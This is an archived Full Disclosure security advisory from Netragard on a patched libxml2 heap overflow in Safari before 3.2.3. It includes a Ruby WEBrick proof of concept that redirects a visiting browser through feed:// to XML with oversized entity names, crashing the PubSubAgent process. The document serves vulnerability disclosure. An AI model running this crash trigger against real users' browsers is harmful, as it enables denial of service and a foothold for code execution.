Full Disclosure mailing list archives

[NETRAGARD SECURITY ADVISORY] [< Safari 3.2.3 Arbitrary Code Execution + PoC ][NETRAGARD-20090622]

From: Netragard Advisories <advisories () netragard com>
Date: Mon, 22 Jun 2009 09:36:09 -0400

*************************** NETRAGARD ADVISORY ************************
                                              http://www.netragard.com

"The Specialist in Anti-Hacking"


[Advisory Summary]
---------------------------------------------------------------------------------------------------
Advisory Author                 : Adriel T. Desautels
Researcher                              : Kevin Finisterre
Advisory ID                             : NETRAGARD-20090622
Product Name                    : Mac OS X Publication Subscription
Product Version                 : < Safari 3.2.3
Vendor Name                     : http://www.apple.com
Type of Vulnerability           : Buffer Overflow
Impact                                  : Arbitrary Code Execution
Vendor Notified                 : Yes
Patch Released                  : APPLE-SA-2009-05-12
Discovery Date                  : 08/2008

[POSTING NOTICE]
---------------------------------------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.

[Product Description]
---------------------------------------------------------------------------------------------------
Now your favorite web browser is also the fastest on any platform. With
page load speeds that outperform every other major browser on the Mac
or PC, Safari also introduces a few new features to the mix.

Thanks to the built-in RSS reader in Safari, you can scan the latest
news, information, and articles from thousands of websites in one
simple-to-read, searchable article list that Safari assembles for you.
The first browser to feature a built-in RSS reader, Safari is the
ideal way to browse the entire web without using a second application.

Introduced in Mac OS X v10.5, Publication Subscription is a technology
that offers developers a way to subscribe to web feeds from their
applications. Web feeds are documents that contain frequently updated
information. You can use Publication Subscription to allow your
applications to subscribe to podcasts, photocasts, and any other
feed-based document. Publication Subscription handles all the feed
downloads and updates automatically. Publication Subscription
technologies make use of libxml2 in order to parse RSS data.

Libxml2 is the XML C parser and toolkit developed for the Gnome
project (but usable outside of Gnome), it is free software available
under the MIT License. XML itself is a metalanguage used to design
markup languages, i.e. text language where semantic and structure
are added to the content using extra "markup" information enclosed
between angle brackets.

[Technical Summary]
---------------------------------------------------------------------------------------------------
"The 'libxml' library is prone to a heap-based buffer-overflow
vulnerability because the software fails to perform adequate boundary
checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary within the
context of an application using the affected library. Failed exploit
attempts will result in a denial-of-service vulnerability."

-- http://www.securityfocus.com/bid/31126

Safari uses the vulnerable libxml library and can be attacked via
the feed:// input vector.


[Technical Details]
----------------------------------------------------------------------------------------------------
Libxml2 is vulnerable to a heap-based buffer overflow, caused by
improper bounds checking in the xmlParseAttValueComplex() function. By
parsing exceedingly long XML entity names using Libxml2, a remote
attacker can overflow a buffer and execute arbitrary code on the system.
If code execution fails a Denial of Service condition may happen.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529

https://bugzilla.redhat.com/show_bug.cgi?id=461015
http://rhn.redhat.com/errata/RHBA-2008-0878.html
https://bugzilla.redhat.com/show_bug.cgi?id=460396

[Proof Of Concept]
---------------------------------------------------------------------------------------------------
The following testcases allowed for the creation of the below PoC

https://bugzilla.redhat.com/attachment.cgi?id=315476
https://bugzilla.redhat.com/attachment.cgi?id=315477
https://bugzilla.redhat.com/attachment.cgi?id=315478
https://bugzilla.redhat.com/attachment.cgi?id=315479
https://bugzilla.redhat.com/attachment.cgi?id=315480
https://bugzilla.redhat.com/attachment.cgi?id=315481
https://bugzilla.redhat.com/attachment.cgi?id=315482

#!/usr/bin/ruby
#
#   The application PubSubAgent quit unexpectedly.
#
# Process:         PubSubAgent [3764]

# Path: /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent

# Identifier:      PubSubAgent
# Version:         ??? (???)
# Code Type:       X86 (Native)
# Parent Process:  launchd [282]
#
# Date/Time:       2008-10-31 15:31:41.355 -0400
# OS Version:      Mac OS X 10.5.5 (9F33)
# Report Version:  6
#
# Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
#  eax: 0x41414141  ebx: 0x94580535  ecx: 0x00136150  edx: 0x05050500
#  edi: 0x00007000  esi: 0x00100000  ebp: 0xbfffe298  esp: 0xbfffe220
#   ss: 0x0000001f  efl: 0x00010206  eip: 0x94580605   cs: 0x00000017
#   ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
#  cr2: 0x05050500

require 'webrick'
include WEBrick

XML_LOVE =
'<?xml version="1.0"?>' + "\n" +
'<!DOCTYPE longentity [' + "\n" +
'<!ELEMENT longentity (#PCDATA)>' + "\n" +
'<!ENTITY ' +
"A" * 1000 + " " +
'"ha"> ]>' + "\n" +
'<longentity location="&' +
"A" * 1000 +
';">text</longentity>' + "\n"

REDIR_LOVE =
'<meta http-equiv="REFRESH" content="0;url=feed://' + ARGV[0] + '/pwn">'

s = HTTPServer.new( :Port => 80 )

class REDIRECT < HTTPServlet::AbstractServlet
 def do_GET(req, res)
   res.body = REDIR_LOVE
   res['Content-Type'] = "text/html"
 end
end

class XMLLOVER < HTTPServlet::AbstractServlet
 def do_GET(req, res)
   res.body = XML_LOVE
   res['Content-Type'] = "text/xml"
 end
end

s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)

trap("INT"){ s.shutdown }
s.start

[Fix]
---------------------------------------------------------------------------------------------------
https://bugzilla.redhat.com/attachment.cgi?id=315291
http://lists.apple.com/archives/security-announce/2009/May/msg00000.html

[Vendor Status]
---------------------------------------------------------------------------------------------------
Vendor Notified

[Vendor Comments]
---------------------------------------------------------------------------------------------------
Safari 3.2.3 is now available and addresses the following:

libxml
CVE-ID:  CVE-2008-3529
Available for:  Mac OS X v10.4.11, Mac OS X Server v10.4.11,
Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista
Impact:  Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description:  A heap buffer overflow exists in libxml's handling of
long entity names. Visiting a maliciously crafted website may lead to
an unexpected application termination or arbitrary code execution.
This update addresses the issue through improved bounds checking.
Safari 3.2.3 is included in the Mac OS X v10.5.7 update. Safari 3.2.3
on Mac OS X requires either Mac OS X v10.5.7, or Mac OS X v10.4.11
with Security Update 2009-002 installed.

[Disclaimer]
---------------------------------------------------------------------------------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>

Attachment: PGP.sig
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

[NETRAGARD SECURITY ADVISORY] [< Safari 3.2.3 Arbitrary Code Execution + PoC ][NETRAGARD-20090622] Netragard Advisories (Jun 22)